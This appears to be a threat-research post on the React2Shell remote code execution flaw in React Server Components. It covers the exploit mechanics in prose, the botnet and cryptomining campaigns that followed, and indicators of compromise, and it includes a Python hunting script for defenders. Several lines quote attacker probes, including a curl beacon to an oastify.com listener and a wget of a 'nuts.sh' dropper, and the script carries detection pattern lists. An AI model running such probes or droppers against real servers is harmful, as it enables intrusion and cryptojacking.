React-2-Shell!

If you’re running React 19 or Next.js 15+, the last few weeks probably felt less like development and more like emergency patch management. If you’re not, there’s a very real chance your application has already picked up a side hustle as an unpaid cryptominer.

So what actually happens when an attacker comes knocking? Not the dramatic “site goes down” kind of knock. This one is polite, quiet, and very patient.

Phase 1: Pre-Exploitation (Recon & The "Flight" Hijack)

The attack begins with mass scanning. Unlike traditional SQLi or XSS, attackers are looking specifically for Server Action endpoints that handle RSC payloads.

The Mechanics:

The "Flight" protocol is how React streams UI components from server to client. It uses a chunked serialization format. The vulnerability lies in insecure deserialization. By crafting a malicious chunk, attackers can:

  1. Pollute the Prototype: Specially structured payloads can influence the JavaScript prototype chain, causing server-side logic to resolve attacker-controlled properties.
  2. The "Thenable" Trap: Trick the server into treating a piece of data as a Promise (a "thenable"). When the server tries to resolve it, it triggers the polluted then property.
  3. Code Injection: Use the Function() constructor or require('child_process') within that polluted property to execute system commands.

The Recon Probe:

Initial payloads are rarely destructive. Attackers use "Proof of Execution" (PoE) commands to verify the server is vulnerable:

  • DNS Beacons: Commands such as curl <id>.oastify.com or ping against an attacker-controlled listener.
  • Arithmetic Probes: For example, asking the server to calculate 40302 * 41082. If the response contains 1655766164, the RCE is confirmed.

[Image: Exploitation kill-chain]

Phase 2: Post-Exploitation (Campaigns & Chaos)

Once the "bridge" is established (often marked by the string wow i guess im finna bridge now in early PoCs), the automation takes over. We are seeing three primary campaign clusters:

1. The "Nuts" Campaign (Mirai-Style)

This is the "noisy" neighbor. It focuses on high-volume botnet enrollment.

  • Identifier: Uses the tag reactOnMynuts in payloads.
  • Activity: Downloads a shell script (nuts.sh) that pulls architecture-specific binaries (x86, bolts).
  • Goal: Enrolling the server into a Mirai-based botnet for DDoS attacks.

2. The "RondoDoX" Botnet

A more persistent threat targeting both IoT and high-performance web servers.

  • Stealth Tactics: Renames its binaries to [kswapd1] or nginxs to blend into the process list.
  • The "Killer" Script: It actively scans /proc every 45 seconds to find and kill other hackers' miners. It wants 100% of your CPU for itself.
  • Persistence: Sets up systemd services and crontabs to ensure it survives a reboot.

3. The "C3Pool" Mining Wave

Many opportunistic attackers are simply looking for a quick payout via Monero (XMR).

  • Payload: Drops the XMRig miner.
  • Network: Connects to the C3Pool mining network.
  • Impact: Your cloud bill spikes as the miner consumes all available compute resources.

4. Key Threat Actors Involved

  • State-Sponsored: China-nexus groups (Earth Lamia, Jackpot Panda) and North Korean actors were observed deploying backdoors (HISONIC, EtherRAT) within 48 hours of disclosure.
  • Cybercriminals: Widespread deployment of XMRig cryptominers and Linux Loaders targeted smaller businesses, using their server resources for illicit profit.
  • Vulnerable Surface: Shortly after disclosure, security researchers identified over 165,000 unique IP addresses and more than 644,000 domains running vulnerable versions of React Server Components (RSC).
  • Attack Volume: Cloudflare reported a staggering 582 million exploit attempts within the first week of disclosure, averaging roughly 3.49 million probes per hour.
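Hunting for the Phase 1 probe strings and the Phase 2 process names described above, as an added example that is not part of the original post: the log lines and process records are constructed samples, and the kernel-thread check relies on the fact that genuine kernel threads have an empty cmdline (note that kswapd1 is a real thread on NUMA hosts, so the name alone is not an indicator).

```python
"""Offline hunt for the React2Shell indicators quoted in the article.
Samples are constructed; point the scanners at real access logs and /proc data."""
# Strings the article quotes for the recon probe, bridge and 'Nuts' stages (lowercase, matched case-insensitively).
REQUEST_INDICATORS = {
    "oastify.com": "DNS/HTTP beacon to an OAST listener (proof-of-execution probe)",
    "wow i guess im finna bridge now": "early PoC 'bridge' marker",
    "reactonmynuts": "'Nuts' campaign payload tag",
    "nuts.sh": "'Nuts' campaign dropper script",
}
# Process names the article ties to post-exploitation (matched by name or cmdline).
PROCESS_INDICATORS = {
    "nginxs": "RondoDoX masquerading as nginx",
    "xmrig": "XMRig miner (C3Pool wave)",
}

def scan_request_log(lines):
    """Return [(line_no, indicator, description)] for lines carrying an indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        hits.extend((n, ind, desc) for ind, desc in REQUEST_INDICATORS.items() if ind in low)
    return hits

def scan_processes(procs):
    """procs: {'pid', 'name', 'cmdline'}: name as ps shows it, cmdline from /proc/<pid>/cmdline.
    Flags known bad names, plus any bracketed kernel-thread lookalike with a user-space
    cmdline: genuine kernel threads always have an empty cmdline, so [kswapd1] needs this test."""
    hits = []
    for p in procs:
        name, cmdline = p["name"], p["cmdline"]
        bad = next((d for i, d in PROCESS_INDICATORS.items() if i in name or i in cmdline), None)
        if bad:
            hits.append((p["pid"], name, bad))
        elif name.startswith("[") and name.endswith("]") and cmdline:
            hits.append((p["pid"], name, "kernel-thread name with a user-space cmdline"))
    return hits

# Constructed samples (not real captures).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2025:01:02:03 +0000] "POST /app HTTP/1.1" 200 body="curl abc123.oastify.com"',
    '10.0.0.6 - - [10/Dec/2025:01:02:04 +0000] "GET /about HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2025:01:02:05 +0000] "POST /app HTTP/1.1" 200 body="reactOnMynuts; wget nuts.sh"',
]
SAMPLE_PROCS = [
    {"pid": 57,   "name": "[kswapd0]", "cmdline": ""},                   # genuine kernel thread
    {"pid": 4120, "name": "[kswapd1]", "cmdline": "/tmp/.x/[kswapd1]"},  # masquerade
    {"pid": 4133, "name": "nginx",     "cmdline": "nginx: worker process"},
    {"pid": 4188, "name": "nginxs",    "cmdline": "./nginxs"},
    {"pid": 4201, "name": "xmrig",     "cmdline": "./xmrig"},
]
```

Running both scanners over the samples flags the two probe lines and the three masquerading or mining processes while leaving the benign request and the real kswapd0 thread alone.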

If you’ve reached this far, I’ve dropped the full IOC list and patching manifest links below. Honestly? Patch it as soon as you get the time. With a "Time to Exploit" for React2Shell clocking in at under 30 hours, that standard 72-hour enterprise "Emergency" window isn't a safety net; it’s a head start for the bad guys. Don't be the one providing the compute for someone else's botnet.

Links:

https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html

https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/

https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components

https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

https://nextjs.org/blog/security-update-2025-12-11

#React2Shell #ApplicationSecurity #WebSecurity #CloudSecurity #IncidentResponse #ThreatResearch #Infosec #CyberSecurity #ReactJS #NextJS #ServerSideSecurity #RCE #ThreatHunting



Insightful post sir! This really clarifies why immediate patching is the only way to stay ahead of these cryptomining botnets.
